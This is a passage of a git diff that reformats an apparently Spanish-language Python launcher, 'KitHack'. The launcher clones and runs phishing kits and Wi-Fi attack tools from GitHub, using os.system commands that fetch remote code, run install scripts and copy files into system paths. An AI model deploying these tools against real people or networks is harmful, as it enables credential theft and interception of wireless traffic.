https://github.com/FDX100/Phisher-man.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/Phisher-man" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd Phisher-man && python phisherman.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd Phisher-man && python phisherman.py" + ) + def Spectre(): - if not os.path.isdir('tools/Phishing/Spectre'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Phishing && git clone https://github.com/Pure-L0G1C/Spectre.git && cd Spectre && chmod +x install.sh && bash install.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/Spectre".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd Spectre && python spectre.py --help') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd Spectre && python spectre.py --help') + if not os.path.isdir("tools/Phishing/Spectre"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Phishing && git clone https://github.com/Pure-L0G1C/Spectre.git && cd Spectre && chmod +x install.sh && bash install.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/Spectre" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd Spectre && python spectre.py --help" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd Spectre && python spectre.py --help" + ) + def Blackeye(): - if not os.path.isdir('tools/Phishing/blackeye'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Phishing && git clone https://github.com/An0nUD4Y/blackeye.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/blackeye".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('clear && cd tools && cd Phishing && cd blackeye && bash blackeye.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('clear && cd tools && cd Phishing && cd blackeye && bash blackeye.sh') + if not os.path.isdir("tools/Phishing/blackeye"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Phishing && git clone https://github.com/An0nUD4Y/blackeye.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/blackeye" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "clear && cd tools && cd Phishing && cd blackeye && bash blackeye.sh" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "clear && cd tools && cd Phishing && cd blackeye && bash blackeye.sh" + ) + def PhEmail(): - if not os.path.isdir('tools/Phishing/PhEmail'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Phishing && git clone https://github.com/Dionach/PhEmail.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/PhEmail".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd PhEmail && python phemail.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd PhEmail && python phemail.py') + if not os.path.isdir("tools/Phishing/PhEmail"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Phishing && git clone https://github.com/Dionach/PhEmail.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/PhEmail" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd PhEmail && python phemail.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd PhEmail && python phemail.py") + def Weeman(): - if not os.path.isdir('tools/Phishing/weeman'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Phishing && git clone https://github.com/evait-security/weeman.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/weeman".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd weeman && python weeman.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd weeman && python weeman.py') + if not os.path.isdir("tools/Phishing/weeman"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Phishing && git clone https://github.com/evait-security/weeman.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/weeman" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd weeman && python weeman.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd weeman && python weeman.py") + def Zphisher(): - if not os.path.isdir('tools/Phishing/zphisher'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Phishing && git clone https://github.com/htr-tech/zphisher.git && cd zphisher && chmod +x zphisher.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/zphisher".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd zphisher && bash zphisher.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd zphisher && bash zphisher.sh') + if not os.path.isdir("tools/Phishing/zphisher"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Phishing && git clone https://github.com/htr-tech/zphisher.git && cd zphisher && chmod +x zphisher.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/zphisher" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd zphisher && bash zphisher.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd zphisher && bash zphisher.sh") + def AIOPhish(): - if not os.path.isdir('tools/Phishing/AIOPhish'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Phishing && git clone https://github.com/DeepSociety/AIOPhish.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/AIOPhish".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd AIOPhish && bash aiophish.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Phishing && cd AIOPhish && bash aiophish.sh') - -#Tools Wifi + if not os.path.isdir("tools/Phishing/AIOPhish"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Phishing && git clone https://github.com/DeepSociety/AIOPhish.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Phishing/AIOPhish" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd AIOPhish && bash aiophish.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Phishing && cd AIOPhish && bash aiophish.sh") + + +# Tools Wifi + + def Fluxion(): - if not os.path.isdir('tools/Wifi/fluxion'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/FluxionNetwork/fluxion.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/fluxion".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd fluxion && bash fluxion.sh -i') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd fluxion && bash fluxion.sh -i') + if not os.path.isdir("tools/Wifi/fluxion"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/FluxionNetwork/fluxion.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/fluxion" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd fluxion && bash fluxion.sh -i") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd fluxion && bash fluxion.sh -i") + def Wifiphisher(): - if not os.path.isdir('tools/Wifi/wifiphisher'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/wifiphisher/wifiphisher.git && cd wifiphisher && python setup.py install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/wifiphisher".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('wifiphisher') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('wifiphisher') + if not os.path.isdir("tools/Wifi/wifiphisher"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/wifiphisher/wifiphisher.git && cd wifiphisher && python setup.py install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/wifiphisher" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("wifiphisher") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("wifiphisher") + def Wifibroot(): - if not os.path.isdir('tools/Wifi/WiFiBroot'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/hash3liZer/WiFiBroot.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/WiFiBroot".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd WiFiBroot && python wifibroot.py -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd WiFiBroot && python wifibroot.py -h') + if not os.path.isdir("tools/Wifi/WiFiBroot"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/hash3liZer/WiFiBroot.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/WiFiBroot" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd WiFiBroot && python wifibroot.py -h" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd WiFiBroot && python wifibroot.py -h" + ) + def Wifite(): - if not os.path.isdir('tools/Wifi/wifite'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/derv82/wifite.git && cd wifite && chmod +x wifite.py') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/wifite".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd wifite && python wifite.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd wifite && python wifite.py') + if not os.path.isdir("tools/Wifi/wifite"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/derv82/wifite.git && cd wifite && chmod +x wifite.py" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/wifite". + format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Wifi && cd wifite && python wifite.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Wifi && cd wifite && python wifite.py") + def Ettercap(): - if not os.path.isfile('/usr/bin/ettercap'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt-get install zlib1g zlib1g-dev && apt-get install build-essential && apt-get install ettercap && apt-get install ettercap-graphical') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en /usr/bin/ettercap".format(GREEN, DEFAULT)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('ettercap -G') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('ettercap -G') + if not os.path.isfile("/usr/bin/ettercap"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt-get install zlib1g zlib1g-dev && apt-get install build-essential && apt-get install ettercap && apt-get install ettercap-graphical" + ) + print("\n{0}[✔] Done.{1}\nHerramienta guardada en /usr/bin/ettercap". + format(GREEN, DEFAULT)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("ettercap -G") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("ettercap -G") + def Linset(): - if not os.path.isdir('tools/Wifi/linsetmv1-2'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/chunkingz/linsetmv1-2.git && cd linsetmv1-2 && chmod a+x linsetmv1-2 && mv linset /') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/linsetmv1-2".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd linsetmv1-2 && bash linsetmv1-2.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Wifi && cd linsetmv1-2 && bash linsetmv1-2.sh') + if not os.path.isdir("tools/Wifi/linsetmv1-2"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/chunkingz/linsetmv1-2.git && cd linsetmv1-2 && chmod a+x linsetmv1-2 && mv linset /" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/linsetmv1-2" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd linsetmv1-2 && bash linsetmv1-2.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Wifi && cd linsetmv1-2 && bash linsetmv1-2.sh") + def WiFiPumpkin(): - if not os.path.isdir('tools/Wifi/wifipumpkin3'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt install python3.7-dev python3-pyqt5 libssl-dev libffi-dev build-essential python3.7 && cd tools && cd Wifi && git clone https://github.com/P0cL4bs/wifipumpkin3.git && cd wifipumpkin3 && python3 setup.py install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/wifipumpkin3".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('wifipumpkin3') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('wifipumpkin3') + if not os.path.isdir("tools/Wifi/wifipumpkin3"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt install python3.7-dev python3-pyqt5 libssl-dev libffi-dev build-essential python3.7 && cd tools && cd Wifi && git clone https://github.com/P0cL4bs/wifipumpkin3.git && cd wifipumpkin3 && python3 setup.py install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/wifipumpkin3" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("wifipumpkin3") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("wifipumpkin3") + def Wifresti(): - if not os.path.isdir('tools/Wifi/wifresti'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/LionSec/wifresti.git && cd wifresti && cp wifresti.py /usr/bin/wifresti && chmod +x /usr/bin/wifresti') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/wifresti".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('wifresti') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('wifresti') + if not os.path.isdir("tools/Wifi/wifresti"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/LionSec/wifresti.git && cd wifresti && cp wifresti.py /usr/bin/wifresti && chmod +x /usr/bin/wifresti" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/wifresti" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("wifresti") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("wifresti") + def EvilLimiter(): - if not os.path.isdir('tools/Wifi/evillimiter'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/bitbrute/evillimiter.git && cd evillimiter && python3 setup.py install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/evillimiter".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('evillimiter') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('evillimiter') + if not os.path.isdir("tools/Wifi/evillimiter"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Wifi && git clone https://github.com/bitbrute/evillimiter.git && cd evillimiter && python3 setup.py install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/evillimiter" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("evillimiter") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("evillimiter") + def NetoolToolkit(): - if not os.path.isdir('tools/Wifi/netool-toolkit'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Wifi && git clone https://github.com/r00t-3xp10it/netool-toolkit.git && cd netool-toolkit && chmod +x INSTALL.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Wifi/netool-toolkit".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - 